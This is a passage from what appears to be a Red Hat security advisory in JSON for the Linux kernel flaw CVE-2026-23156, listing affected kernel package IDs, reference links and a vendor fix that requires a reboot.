"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23156"
},
{
"category": "external",
"summary": "RHBZ#2439951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439951"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23156"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026021416-CVE-2026-23156-b2f4@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026021416-CVE-2026-23156-b2f4@gregkh/T"
}
],
"release_date": "2026-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T18:30:02+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
